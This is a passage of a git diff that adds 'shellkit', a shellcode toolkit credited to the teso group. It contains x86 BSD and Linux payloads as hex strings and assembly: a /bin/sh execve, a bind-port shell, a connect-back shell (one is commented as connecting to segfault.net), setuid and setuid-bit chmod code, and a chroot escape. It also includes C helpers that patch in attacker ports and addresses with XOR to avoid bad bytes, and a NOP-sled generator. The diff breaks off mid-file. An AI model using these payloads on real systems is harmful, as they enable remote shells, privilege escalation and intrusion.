37 switch (xferstr[0]) {
38 case ('0'):
39 BSET (tgt, 1, 0, bw);
40 break;
41 case ('1'):
42 BSET (tgt, 1, 1, bw);
43 break;
44 case ('r'):
45 BSET (tgt, 3, x86_nop_rwreg (), bw);
46 break;
47 case ('.'):
48 break; /* ignore */
49 default:
50 fprintf (stderr, "on steroids, huh?\n");
51 exit (EXIT_FAILURE);
52 break;
53 }
54 }
55
56 if (bw != 8) {
57 fprintf (stderr, "invalid bitwalker: bw = %d\n", bw);
58 exit (EXIT_FAILURE);
59 }
60
61 return (tgt);
62}
63
64
65unsigned int
66x86_nop (unsigned char *dest, unsigned int dest_len,
67 unsigned char *bad, int bad_len)
68{
69 int walk;
70 int bcount; /* bad counter */
71 char * xs;
72 char * xferstr[] = {
73 "0011.0111", /* aaa */
74 "0011.1111", /* aas */
75 "1001.1000", /* cbw */
76 "1001.1001", /* cdq */
77 "1111.1000", /* clc */
78 "1111.1100", /* cld */
79 "1111.0101", /* cmc */
80 "0010.0111", /* daa */
81 "0010.1111", /* das */
82 "0100.1r", /* dec <reg> */
83 "0100.0r", /* inc <reg> */
84 "1001.1111", /* lahf */
85 "1001.0000", /* nop */
86 "1111.1001", /* stc */
87 "1111.1101", /* std */
88 "1001.0r", /* xchg al, <reg> */
89 NULL,
90 };
91 unsigned char tgt;
92
93/*
94 * XXX: those nops are only one byte long. they could be used as byte values
95 * in opcodes like mov (add, sub, or, ...) as value. that would increase the
96 * randomness of the string. since the value is "nop save" we have no problem
97 * if the execution starts within this nop.
98 * now, having word sized nops, even larger nops are possible (again increasssing
99 * the randomness of the nop string).
100 * however, its a little complicated ;)
101 */
102
103 for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) {
104 /* avoid endless loops on excessive badlisting */
105 for (bcount = 0 ; bcount < 16384 ; ++bcount) {
106 xs = xferstr[random_get (0, 15)];
107 tgt = x86_nop_xfer (xs);
108
109 dest[walk] = tgt;
110 if (badstr (&dest[walk], 1, bad, bad_len) == 0)
111 break;
112 }
113
114 /* should not happen */
115 if (bcount >= 16384) {
116 fprintf (stderr, "too much blacklisting, giving up...\n");
117 exit (EXIT_FAILURE);
118 }
119 }
120
121 return (walk);
122}
123
124
diff --git a/other/shellkit/x86.h b/other/shellkit/x86.h
new file mode 100644
index 0000000..f902a38
--- /dev/null
+++ b/other/shellkit/x86.h
@@ -0,0 +1,21 @@
1
2#ifndef X86_H
3#define X86_H
4
5#define x86_TERMINATOR "\x78\x56\x34\x12"
6
7
8/* x86_nop
9 *
10 * generate `dest_len' bytes of nopspace at `dest', which does not contain
11 * any of the characters in `bad', which is `bad_len' bytes long.
12 *
13 * return number of bytes generated
14 */
15
16unsigned int
17x86_nop (unsigned char *dest, unsigned int dest_len,
18 unsigned char *bad, int bad_len);
19
20#endif
21
diff --git a/other/shellkit/x86.o b/other/shellkit/x86.o
new file mode 100644
index 0000000..5aa43d4
--- /dev/null
+++ b/other/shellkit/x86.o
Binary files differ
diff --git a/other/shellkit/x86_bsd.c b/other/shellkit/x86_bsd.c
new file mode 100644
index 0000000..1946250
--- /dev/null
+++ b/other/shellkit/x86_bsd.c
@@ -0,0 +1,73 @@
1
2#include <stdio.h>
3#include <stdlib.h>
4#include <string.h>
5#include "shellcode.h"
6#include "x86.h"
7
8
9/* ATTENTION: this must be first of concated shellcodes and the last
10 one must be terminated with x86_TERMINATOR */
11shellcode x86_bsd_spset = {
12 "x86-bsd-spset",
13 20,
14 "\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a"
15 "\x74\x06\x39\xc3\x74\xf3\xeb\xf4"
16};
17
18
19/* ATTENTION: connects to segfault.net at the moment */
20shellcode x86_bsd_connectsh = {
21 "x86-bsd-connectsh",
22 66,
23 "\x31\xed\xf7\xe5\x55\x45\x55\x45\x55\xb0\x61\x55"
24 "\xcd\x80\x96\x68\xc3\x58\xb0\xca\x66\x68\x44\x44"
25 "\x66\x55\x89\xe7\x6a\x10\x57\x56\x56\x6a\x62\x58"
26 "\xcd\x80\x60\xb0\x5a\xcd\x80\x4d\x79\xf8\x52\x89"
27 "\xe3\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x60"
28 "\x5e\x5e\xb0\x3b\xcd\x80"
29};
30
31shellcode x86_bsd_portshellsh = {
32 "x86-bsd-portshellsh",
33 73,
34 "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53"
35 "\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5"
36 "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a"
37 "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a"
38 "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73"
39 "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd"
40 "\x80"
41};
42
43shellcode x86_bsd_execvesh = {
44 "x86-bsd-execvesh",
45 22,
46 "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68"
47 "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"
48};
49
50shellcode x86_bsd_exit = {
51 "x86-bsd-exit",
52 5,
53 "\x31\xc0\x40\xcd\x80"
54};
55
56
57shellcode * x86_bsd_shellcodes[] = {
58 &x86_bsd_execvesh, /* TODO: add other shellcodes here */
59 &x86_bsd_exit,
60 &x86_bsd_portshellsh,
61 &x86_bsd_connectsh,
62 &x86_bsd_spset,
63 NULL,
64};
65
66arch x86_bsd = {
67 "x86-bsd",
68 1,
69 x86_nop,
70 x86_bsd_shellcodes,
71};
72
73
diff --git a/other/shellkit/x86_bsd.h b/other/shellkit/x86_bsd.h
new file mode 100644
index 0000000..8a7b1ba
--- /dev/null
+++ b/other/shellkit/x86_bsd.h
@@ -0,0 +1,12 @@
1
2#ifndef X86_BSD_H
3#define X86_BSD_H
4
5#include "x86.h"
6#include "shellcode.h"
7
8arch x86_bsd;
9
10
11#endif
12
diff --git a/other/shellkit/x86_bsd.o b/other/shellkit/x86_bsd.o
new file mode 100644
index 0000000..0b42a2c
--- /dev/null
+++ b/other/shellkit/x86_bsd.o
Binary files differ
diff --git a/other/shellkit/x86_bsd/FIXME_chmod.s b/other/shellkit/x86_bsd/FIXME_chmod.s
new file mode 100644
index 0000000..6f19d23
--- /dev/null
+++ b/other/shellkit/x86_bsd/FIXME_chmod.s
@@ -0,0 +1,43 @@
1/* x86/BSD PIC local chmod code
2 *
3 * by stealth
4 */
5
6 .globl cbegin
7 .globl cend
8
9cbegin:
10 jmp boomsh
11
12foo: popl %ebx
13 incl (%ebx)
14 incl 4(%ebx)
15
16 xorl %eax, %eax
17 movb %al, 11(%ebx)
18
19 movb $16, %al /* chown */
20 xorl %ecx, %ecx
21 pushl %ecx
22 pushl %ecx
23 pushl %ebx
24 pushl $1
25sys_1: int $0x80
26
27 xorl %eax, %eax /* chmod */
28 movb $15, %al
29 pushw $06755
30 pushl %ebx
31 pushl $1
32sys_2: int $0x80
33
34 xorl %eax, %eax
35 incl %eax /* exit */
36 pushl $1
37sys_3: int $0x80
38
39boomsh: call foo
40 .string ".tmp.boomsh.";
41cend:
42
43
diff --git a/other/shellkit/x86_bsd/bindshell.s b/other/shellkit/x86_bsd/bindshell.s
new file mode 100644
index 0000000..8921fa9
--- /dev/null
+++ b/other/shellkit/x86_bsd/bindshell.s
@@ -0,0 +1,59 @@
1/* x86/BSD bindsh shellcode (73 bytes)
2
3 lorian / teso
4*/
5
6 .globl _cbegin
7 .globl cbegin
8 .globl _cend
9 .globl cend
10
11_cbegin:
12cbegin:
13 xorl %ebx, %ebx
14 mull %ebx
15 pushl %ebx
16 incl %ebx
17 pushl %ebx
18 incl %ebx
19 pushl %ebx
20 movb $0x61, %al
21 pushl %ebx
22 int $0x80
23 xchgl %esi, %eax
24 pushl %edx
25 pushw $0x4444
26 pushw %bx
27 movl %esp, %ebp
28 pushl $0x10
29 pushl %ebp
30 pushl %esi
31 pushl %esi
32 pushl $0x68
33 popl %eax
34 int $0x80
35 movb $0x6a, %al
36 int $0x80
37 pusha
38 movb $0x1e, %al
39 int $0x80
40a:
41 pushl %ebx
42 pushl %eax
43 pushl %eax
44 movb $0x5a, %al
45 int $0x80
46 decl %ebx
47 jns a
48 pushl %edx
49 movl %esp, %ebx
50 push $0x68732F6E
51 push $0x69622F2F
52 pusha
53 popl %esi
54 popl %esi
55 movb $0x3b, %al
56 int $0x80
57
58_cend:
59cend:
diff --git a/other/shellkit/x86_bsd/connectsh b/other/shellkit/x86_bsd/connectsh
new file mode 100644
index 0000000..f9aaab7
--- /dev/null
+++ b/other/shellkit/x86_bsd/connectsh
Binary files differ
diff --git a/other/shellkit/x86_bsd/connectsh.s b/other/shellkit/x86_bsd/connectsh.s
new file mode 100644
index 0000000..562f5ef
--- /dev/null
+++ b/other/shellkit/x86_bsd/connectsh.s
@@ -0,0 +1,51 @@
1/* x86/BSD connectsh shellcode (66 bytes)
2
3 lorian / teso
4*/
5
6 .globl _cbegin
7 .globl cbegin
8 .globl _cend
9 .globl cend
10
11_cbegin:
12cbegin:
13 xorl %ebp, %ebp
14 mull %ebp
15 pushl %ebp
16 incl %ebp
17 pushl %ebp
18 incl %ebp
19 pushl %ebp
20 movb $0x61, %al
21 pushl %ebp
22 int $0x80
23 xchgl %esi, %eax
24 pushl $0xcab058c3
25 pushw $0x4444
26 pushw %bp
27 movl %esp, %edi
28 pushl $0x10
29 pushl %edi
30 pushl %esi
31 pushl %esi
32 pushl $0x62
33 popl %eax
34 int $0x80
35a: pusha
36 movb $0x5a, %al
37 int $0x80
38 decl %ebp
39 jns a
40 pushl %edx
41 movl %esp, %ebx
42 push $0x68732F6E
43 push $0x69622F2F
44 pusha
45 popl %esi
46 popl %esi
47 movb $0x3b, %al
48 int $0x80
49
50_cend:
51cend:
diff --git a/other/shellkit/x86_bsd/execvesh b/other/shellkit/x86_bsd/execvesh
new file mode 100644
index 0000000..7518768
--- /dev/null
+++ b/other/shellkit/x86_bsd/execvesh
Binary files differ
diff --git a/other/shellkit/x86_bsd/execvesh.s b/other/shellkit/x86_bsd/execvesh.s
new file mode 100644
index 0000000..370e7a4
--- /dev/null
+++ b/other/shellkit/x86_bsd/execvesh.s
@@ -0,0 +1,31 @@
1/* x86/BSD execve /bin/sh shellcode
2 *
3 * lorian / teso
4 */
5
6/* somehow the obsd on plan9 where i tested it, needs the labels
7 * exported with _ before, while freebsd doesnt
8 */
9
10/* argv: OBSD needs a pointer to NULL, FBSD accepts NULL */
11
12 .globl cbegin
13 .globl _cbegin
14 .globl cend
15 .globl _cend
16
17_cbegin:
18cbegin:
19 pushl $0x3b
20 popl %eax
21 cdq
22 pushl %edx
23 movl %esp, %ebx
24 push $0x68732F6E
25 push $0x69622F2F
26 pusha /* FULLPOWER */
27 pop %esi
28 pop %esi
29 int $0x80
30_cend:
31cend:
diff --git a/other/shellkit/x86_bsd/exit.s b/other/shellkit/x86_bsd/exit.s
new file mode 100644
index 0000000..7993035
--- /dev/null
+++ b/other/shellkit/x86_bsd/exit.s
@@ -0,0 +1,18 @@
1/* x86/BSD exit shellcode
2 *
3 * lorian / teso
4 */
5 .globl cbegin
6 .globl _cbegin
7 .globl cend
8 .globl _cend
9
10_cbegin:
11cbegin:
12
13 xorl %eax, %eax
14 incl %eax
15 int $0x80
16
17_cend:
18cend:
diff --git a/other/shellkit/x86_bsd/spset.s b/other/shellkit/x86_bsd/spset.s
new file mode 100644
index 0000000..9bc19f4
--- /dev/null
+++ b/other/shellkit/x86_bsd/spset.s
@@ -0,0 +1,36 @@
1/* x86 spset shellcode
2 *
3 * lorian / teso
4 */
5 .globl cbegin
6 .globl _cbegin
7 .globl cend
8 .globl _cend
9
10/* searches for 512 bytes "free" space on stack without destroying it
11 * like any kind of call would do...
12 *
13 * NOTE: your real shellcode must be terminated with
14 * \x78\x56\x34\x12 for this code to work...
15 */
16
17_cbegin:
18cbegin:
19
20 movl $0x12345678, %eax
21a:
22 cdq
23 movb $0x02, %dh
24b:
25 popl %ebx
26 pushl %ebx
27 incl %esp
28 decl %edx
29 jz c
30 cmpl %eax, %ebx
31 je a
32 jmp b
33c:
34
35_cend:
36cend:
diff --git a/other/shellkit/x86_linux.c b/other/shellkit/x86_linux.c
new file mode 100644
index 0000000..d8b6398
--- /dev/null
+++ b/other/shellkit/x86_linux.c
@@ -0,0 +1,352 @@
1/* FIXME: needs cleanup -sc
2 */
3
4#include <stdio.h>
5#include <string.h>
6#include <netinet/in.h>
7#include "shellcode.h"
8
9
10/* ATTENTION: this must be first of concated shellcodes and the last
11 one must be terminated with x86_TERMINATOR */
12shellcode x86_linux_spset = {
13 "x86-linux-spset",
14 20,
15 "\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a"
16 "\x74\x06\x39\xc3\x74\xf3\xeb\xf4",
17};
18
19
20shellcode x86_linux_execvesh = {
21 "x86-linux-execvesh",
22 23,
23 "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f"
24 "\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80",
25};
26
27
28shellcode x86_linux_exit = {
29 "x86-linux-exit",
30 5,
31 "\x31\xc0\x40\xcd\x80",
32};
33
34
35shellcode x86_linux_setgid = {
36 "x86-linux-setgid",
37 14,
38 "\x6a\x2e\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42"
39 /* ^^ ^^ xor'ed with ^^ ^^ is the uid */
40 "\xcd\x80",
41};
42
43
44shellcode x86_linux_setuid = {
45 "x86-linux-setuid",
46 14,
47 "\x6a\x17\x58\x66\xbb\x41\x41\x66\x81\xf3\x42\x42"
48 /* ^^ ^^ xor'ed with ^^ ^^ is the uid */
49 "\xcd\x80",
50};
51
52
53shellcode x86_linux_setreuid = {
54 "x86-linux-setreuid",
55 23,
56 "\x6a\x46\x58\x66\xbb\x41\x41\x66\x81\xf3\x41\x41"
57 /* ^^ ^^ ^^ ^^ */
58 "\x66\xb9\x42\x42\x66\x81\xf1\x42\x42\xcd\x80",
59 /* ^^ ^^ ^^ ^^ */
60};
61
62
63shellcode x86_linux_chmod = {
64 "x86-linux-chmod",
65 22,
66 "\xeb\x0f\x31\xc0\x5b\x88\x43\x00"
67 /* ^^ file name length */
68 "\xb9\x41\x41\x41\x41\xb0\x0f\xcd\x80\xe8\xec\xff"
69 /* ^^ ^^ ^^ ^^ mode */
70 "\xff\xff",
71};
72
73
74shellcode x86_linux_chroot = {
75 "x86-linux-chroot",
76 42,
77 "\x99\xb9\x50\x73\x50\x73\x50\x68\x41\x41\x2e\x2e"
78 "\x89\xe3\xb0\x27\xcd\x80\xb0\x3d\xcd\x80\x80\xc3"
79 "\x02\xfe\xc2\xb0\x0c\xcd\x80\x80\xfa\x6a\x75\xf5"
80 "\xfe\xc3\xb0\x3d\xcd\x80",
81};
82
83
84shellcode x86_linux_portshellsh = {
85 "x86-linux-portshellsh",
86 94,
87 "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50"
88 "\x89\xe1\xb0\x66\xcd\x80\x52\x66\x68\x50\x73\x66"
89 /* ^^ ^^ */
90 "\x52\x89\xe2\x6a\x10\x52\x50\x89\xe1\xfe\xc3\x89"
91 "\xc2\xb0\x66\xcd\x80\x80\xc3\x02\xb0\x66\xcd\x80"
92 "\x50\x52\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x89\xc3"
93 "\x31\xc9\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"
94 "\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
95 "\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80",
96};
97
98
99shellcode x86_linux_connectsh = {
100 "x86-linux-connectsh",
101 88,
102 "\x31\xc0\x99\x50\xfe\xc0\x89\xc3\x50\xfe\xc0\x50"
103 "\x89\xe1\xb0\x66\xcd\x80\xb9\x41\x41\x41\x41\x81"
104 /* ^^ ^^ ^^ ^^ */
105 "\xf1\x3e\x41\x41\x40\x51\x66\x68\x50\x74\x66\x52"
106 /* ^^ ^^ ^^ ^^ ^^ ^^ */
107 "\x89\xe1\x89\xc2\x6a\x10\x51\x52\x89\xe1\xb3\x03"
108 "\xb0\x66\xcd\x80\x89\xd3\x31\xc9\xb0\x3f\xcd\x80"
109 "\xfe\xc1\xb0\x3f\xcd\x80\xb0\x0b\x99\x52\x68\x6e"
110 "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
111 "\x89\xe1\xcd\x80",
112};
113
114
115shellcode x86_linux_read = {
116 "x86-linux-read",
117 16,
118 "\xeb\x0e\xb2\xfa\x59\x6a\x41\x5b\x80\xf3\x41\x6a"
119 "\x03\x58\xcd\x80",
120};
121
122
123shellcode *x86_linux_shellcodes[] = {
124 &x86_linux_chmod,
125 &x86_linux_chroot,
126 &x86_linux_connectsh,
127 &x86_linux_execvesh,
128 &x86_linux_exit,
129 &x86_linux_portshellsh,
130 &x86_linux_read,
131 &x86_linux_setgid,
132 &x86_linux_setuid,
133 &x86_linux_setreuid,
134 &x86_linux_spset,
135 NULL,
136};
137
138
139arch x86_linux = {
140 "x86-linux",
141 1,
142 NULL, /* for nops use the same function as in arch bsd */
143 x86_linux_shellcodes
144};
145
146
147int
148isLegal (unsigned char x) /* XXX: Move this to a global position */
149{
150 switch (x) {
151 case 0x00:
152 case 0x0a:
153 case 0x0d:
154 case 0x25:
155 return 0;
156 }
157 return 1;
158}
159
160
161unsigned short int
162getxorer (unsigned short int value)
163{
164 unsigned short int xor = 0x8f8f, temp;
165
166
167 temp = (xor ^ value) & 0xff00;
168 switch (temp) {
169 case 0x0000 :
170 case 0x0a00 :
171 case 0x0d00 :
172 case 0x2500 : xor^=0x8000;
173 break;
174 }
175
176 temp = (xor ^ value) & 0xff;
177 switch (temp) {
178 case 0x00 :
179 case 0x0a :
180 case 0x0d :
181 case 0x25 : xor^=0x80;
182 break;
183 }
184
185 return xor;
186}
187
188
189unsigned long int
190getxorer4 (unsigned long int v)
191{
192 unsigned long int xor = 0x8f8f8f8f,
193 temp,
194 x;
195
196
197 for (x = 0; x < 4; x++) {
198 temp = ((xor ^ v) >> (x * 8)) & 0xff;
199 if (!isLegal (temp)) {
200 xor ^= (0x80 << (x * 8));
201 }
202 }
203
204 return xor;
205}
206
207
208void
209x86_linux_chmod_setup (unsigned char *code, unsigned char *file,
210 unsigned long int mode)
211{
212 unsigned char length = 0;
213
214
215 length = strlen (file);
216 if (length > 255 || !isLegal (length)) {
217 printf ("Change length of file name. code will be left unchanged.\n");
218 return;
219 }
220 code[7] = length;
221
222/* XXX: WRITE ME! */
223
224 return;
225}
226
227
228void
229x86_linux_setgid_setup (unsigned char *code, unsigned short int gid)
230{
231 unsigned short xor = 0;
232
233
234 xor = getxorer (gid);
235
236 code[10] = xor & 0xff;
237 code[11] = (xor >> 8) & 0xff;
238
239 gid ^= xor;
240
241 code[5] = gid & 0xff;
242 code[6] = (gid >> 8) & 0xff;
243
244 return;
245}
246
247
248void
249x86_linux_setuid_setup (unsigned char *code, unsigned short int uid)
250{
251 unsigned short xor = 0;
252
253
254 xor = getxorer (uid);
255
256 code[10] = xor & 0xff;
257 code[11] = (xor >> 8) & 0xff;
258
259 uid ^= xor;
260
261 code[5] = uid & 0xff;
262 code[6] = (uid >> 8) & 0xff;
263
264 return;
265}
266
267
268void
269x86_linux_setreuid_setup (unsigned char *code,
270 unsigned short int ruid, unsigned short int euid)
271{
272 unsigned short xor_a = 0,
273 xor_b = 0;
274
275
276 xor_a = getxorer (ruid);
277 xor_b = getxorer (euid);
278
279 code[10] = xor_a & 0xff;
280 code[11] = (xor_a >> 8) & 0xff;
281
282 code[19] = xor_b & 0xff;
283 code[20] = (xor_b >> 8) & 0xff;
284
285 ruid ^= xor_a;
286 euid ^= xor_b;
287
288 code[5] = ruid & 0xff;
289 code[6] = (ruid >> 8) & 0xff;
290
291 code[14] = euid & 0xff;
292 code[15] = (euid >> 8) & 0xff;
293
294 return;
295}
296
297
298void
299x86_linux_portshell_setup (unsigned char *code, unsigned short int port)
300{
301 port = htons (port);
302
303 if (!isLegal(port & 0xff) || !isLegal((port & 0xff00) >> 8)) {
304 printf ("Error:\t choosen port would produced illegal bytes.\n");
305 printf ("\t code will be left unchanged.\n");
306 return;
307 }
308
309 code[22] = (port >> 8) & 0xff;
310 code[21] = port & 0xff;
311
312 return;
313}
314
315
316void
317x86_linux_connectshell_setup (unsigned char *code,
318 unsigned long int raddr,
319 unsigned short int rport)
320{
321 unsigned long int raddr_xor = 0;
322
323
324 rport = htons (rport);
325 if (!isLegal(rport & 0xff) || !isLegal((rport & 0xff00) >> 8)) {
326 printf ("Error:\t choosen remote port would produced illegal bytes.\n");
327 printf ("\t code will be left unchanged.\n");
328
329 return;
330 }
331
332 raddr_xor = getxorer4 (raddr);
333
334 raddr ^= raddr_xor;
335
336 code[22] = (raddr_xor >> 24) & 0xff;
337 code[21] = (raddr_xor >> 16) & 0xff;
338 code[20] = (raddr_xor >> 8) & 0xff;
339 code[19] = raddr_xor & 0xff;
340
341 code[28] = (raddr >> 24) & 0xff;
342 code[27] = (raddr >> 16) & 0xff;
343 code[26] = (raddr >> 8) & 0xff;
344 code[25] = raddr & 0xff;
345
346 code[33] = (rport >> 8) & 0xff;
347 code[32] = rport & 0xff;
348
349 return;
350}
351
352
diff --git a/other/shellkit/x86_linux.h b/other/shellkit/x86_linux.h
new file mode 100644
index 0000000..a145c34
--- /dev/null
+++ b/other/shellkit/x86_linux.h
@@ -0,0 +1,32 @@
1
2#ifndef X86_LINUX_H
3#define X86_LINUX_H
4
5#include "x86.h"
6#include "shellcode.h"
7
8arch x86_linux;
9
10
11void
12x86_linux_chmod_setup (unsigned char *, unsigned char *, unsigned long int);
13
14void
15x86_linux_setgid_setup (unsigned char *, unsigned short int);
16
17void
18x86_linux_setuid_setup (unsigned char *, unsigned short int);
19
20void
21x86_linux_setreuid_setup (unsigned char *,
22 unsigned short int, unsigned short int);
23
24void
25x86_linux_portshell_setup (unsigned char *, unsigned short int);
26
27void
28x86_linux_connectshell_setup (unsigned char *,
29 unsigned long int, unsigned short int);
30
31#endif
32
diff --git a/other/shellkit/x86_linux.o b/other/shellkit/x86_linux.o
new file mode 100644
index 0000000..d992733
--- /dev/null
+++ b/other/shellkit/x86_linux.o
Binary files differ
diff --git a/other/shellkit/x86_linux/AUTHORS b/other/shellkit/x86_linux/AUTHORS
new file mode 100644
index 0000000..e5ad29f
--- /dev/null
+++ b/other/shellkit/x86_linux/AUTHORS
@@ -0,0 +1,5 @@
1files by:
2palmers / teso
3
4changed by:
5lorian / teso
diff --git a/other/shellkit/x86_linux/chmod.s b/other/shellkit/x86_linux/chmod.s
new file mode 100644
index 0000000..63efd8b
--- /dev/null
+++ b/other/shellkit/x86_linux/chmod.s
@@ -0,0 +1,23 @@
1
2 .globl cbegin
3 .globl cend
4
5
6cbegin:
7 jmp file
8
9chmod:
10 xorl %eax, %eax
11 popl %ebx
12 movb %al, 0x4(%ebx)
13 movl $0x41414141, %ecx
14
15 movb $0xf, %al
16 int $0x80
17
18file:
19 call chmod
20 .ascii ""
21
22cend:
23
diff --git a/other/shellkit/x86_linux/chroot.s b/other/shellkit/x86_linux/chroot.s
new file mode 100644
index 0000000..dd7e878
--- /dev/null
+++ b/other/shellkit/x86_linux/chroot.s
@@ -0,0 +1,34 @@
1 .globl cbegin
2 .globl cend
3
4
5cbegin:
6/* mkdir AA.. */
7 cdq
8 movl $0x73507350, %ecx
9 push %eax
10 push $0x2e2e4141
11 movl %esp, %ebx
12 movb $0x27, %al
13 int $0x80
14
15/* chroot AA.. */
16 movb $0x3d, %al
17 int $0x80
18
19/* chdir .. x 5 */
20 addb $0x2, %bl
21
22cd_loop:
23 incb %dl
24 movb $0xc, %al
25 int $0x80
26 cmp $0x6a, %dl
27 jne cd_loop
28
29/* chroot . */
30 incb %bl
31 movb $0x3d, %al
32 int $0x80
33cend:
34
diff --git a/other/shellkit/x86_linux/codedump b/other/shellkit/x86_linux/codedump
new file mode 100644
index 0000000..fe9bb8e
--- /dev/null
+++ b/other/shellkit/x86_linux/codedump
Binary files differ
diff --git a/other/shellkit/x86_linux/connect.s b/other/shellkit/x86_linux/connect.s
new file mode 100644
index 0000000..452a1d4
--- /dev/null
+++ b/other/shellkit/x86_linux/connect.s
@@ -0,0 +1,61 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5
6/* socket */
7 xorl %eax, %eax
8 cdq
9 push %eax
10 incb %al
11 movl %eax, %ebx
12 push %eax
13 incb %al
14 push %eax
15 movl %esp, %ecx
16 movb $0x66, %al
17 int $0x80
18
19/* connect */
20 movl $0x41414141, %ecx
21 xorl $0x4041413e, %ecx /* address: 127.0.0.1 */
22 push %ecx
23 pushw $0x7450
24 pushw %dx
25 movl %esp, %ecx
26 movl %eax, %edx
27
28 push $0x10
29 push %ecx
30 push %edx
31 movl %esp, %ecx
32
33 movb $0x03, %bl
34 movb $0x66, %al
35 int $0x80
36
37/* dup2 fd 0 + fd 1 */
38 movl %edx, %ebx
39 xorl %ecx, %ecx
40
41 movb $0x3f, %al
42 int $0x80
43
44 incb %cl
45 movb $0x3f, %al
46 int $0x80
47
48/* execve shell (by lorian, see execve.s) - slightly modified */
49 movb $0x0b, %al
50 cdq
51 pushl %edx
52 push $0x68732F6E
53 push $0x69622F2F
54 movl %esp, %ebx
55 pushl %edx
56 pushl %ebx
57 movl %esp, %ecx
58 int $0x80
59
60cend:
61
diff --git a/other/shellkit/x86_linux/execve b/other/shellkit/x86_linux/execve
new file mode 100644
index 0000000..3a17d3f
--- /dev/null
+++ b/other/shellkit/x86_linux/execve
Binary files differ
diff --git a/other/shellkit/x86_linux/execve.s b/other/shellkit/x86_linux/execve.s
new file mode 100644
index 0000000..2fdb69f
--- /dev/null
+++ b/other/shellkit/x86_linux/execve.s
@@ -0,0 +1,22 @@
1/* x86/linux execve /bin/sh shellcode
2 *
3 * lorian / teso
4 */
5
6 .globl cbegin
7 .globl cend
8
9cbegin:
10 pushl $0x0b
11 popl %eax
12 cdq
13 pushl %edx
14 push $0x68732F6E
15 push $0x69622F2F
16 movl %esp, %ebx
17 pushl %edx
18 pushl %ebx
19 movl %esp, %ecx
20 int $0x80
21
22cend:
diff --git a/other/shellkit/x86_linux/exit.s b/other/shellkit/x86_linux/exit.s
new file mode 100644
index 0000000..1fe28f6
--- /dev/null
+++ b/other/shellkit/x86_linux/exit.s
@@ -0,0 +1,14 @@
1/* x86/linux exit shellcode
2 *
3 * lorian / teso
4 */
5 .globl cbegin
6 .globl cend
7
8cbegin:
9
10 xorl %eax, %eax
11 incl %eax
12 int $0x80
13
14cend:
diff --git a/other/shellkit/x86_linux/portshell.s b/other/shellkit/x86_linux/portshell.s
new file mode 100644
index 0000000..31aa68c
--- /dev/null
+++ b/other/shellkit/x86_linux/portshell.s
@@ -0,0 +1,73 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5
6/* socket */
7 xorl %eax, %eax
8 cdq
9 push %eax
10 incb %al
11 movl %eax, %ebx
12 push %eax
13 incb %al
14 push %eax
15 movl %esp, %ecx
16 movb $0x66, %al
17 int $0x80
18
19/* bind */
20 push %edx
21 pushw $0x7350
22 pushw %dx
23 movl %esp, %edx
24
25 push $0x10
26 push %edx
27 push %eax
28 movl %esp, %ecx
29
30 incb %bl
31 movl %eax, %edx
32 movb $0x66, %al
33 int $0x80
34
35/* listen */
36 addb $0x02, %bl
37 movb $0x66, %al
38 int $0x80
39
40/* accept */
41 push %eax
42 push %edx
43 movl %esp, %ecx
44
45 incb %bl
46 movb $0x66, %al
47 int $0x80
48
49/* dup2 fd 0 + fd 1 */
50 movl %eax, %ebx
51 xorl %ecx, %ecx
52
53 movb $0x3f, %al
54 int $0x80
55
56 incb %cl
57 movb $0x3f, %al
58 int $0x80
59
60/* execve shell (by lorian, see execve.s) - slightly modified */
61 movb $0x0b, %al
62 cdq
63 pushl %edx
64 push $0x68732F6E
65 push $0x69622F2F
66 movl %esp, %ebx
67 pushl %edx
68 pushl %ebx
69 movl %esp, %ecx
70 int $0x80
71
72cend:
73
diff --git a/other/shellkit/x86_linux/portshell_slice.s b/other/shellkit/x86_linux/portshell_slice.s
new file mode 100644
index 0000000..0d4c7b1
--- /dev/null
+++ b/other/shellkit/x86_linux/portshell_slice.s
@@ -0,0 +1,77 @@
1 .globl cbegin
2 .globl cend
3
4cbegin:
5
6/* socket */
7 xorl %eax, %eax
8 cdq
9 push %eax
10 incb %al
11 movl %eax, %ebx
12 push %eax
13 incb %al
14 push %eax
15 movl %esp, %ecx
16 movb $0x66, %al
17 int $0x80
18
19/* bind */
20 push %edx
21 pushw $0x7350
22 pushw %dx
23 movl %esp, %edx
24
25 push $0x10
26 push %edx
27 push %eax
28 movl %esp, %ecx
29
30 incb %bl
31 movl %eax, %edx
32 movb $0x66, %al
33 int $0x80
34
35/* listen */
36 addb $0x02, %bl
37 movb $0x66, %al
38 int $0x80
39
40/* accept */
41 push %eax
42 push %edx
43 movl %esp, %ecx
44
45 incb %bl
46 movb $0x66, %al
47 int $0x80
48
49/* dup2 fd 0 + fd 1 */
50 movl %eax, %ebx
51 xorl %ecx, %ecx
52
53 movb $0x3f, %al
54 int $0x80
55
56 incb %cl
57 movb $0x3f, %al
58 int $0x80
59
60/* execve shell (by lorian, see execve.s) - slightly modified */
61 movb $0x0b, %al
62 cdq
63 pushl %edx
64/* push $0x68732F6E */
65/* push $0x69622F2F */
66 pushw $0x6873
67 pushw $0x2f6e
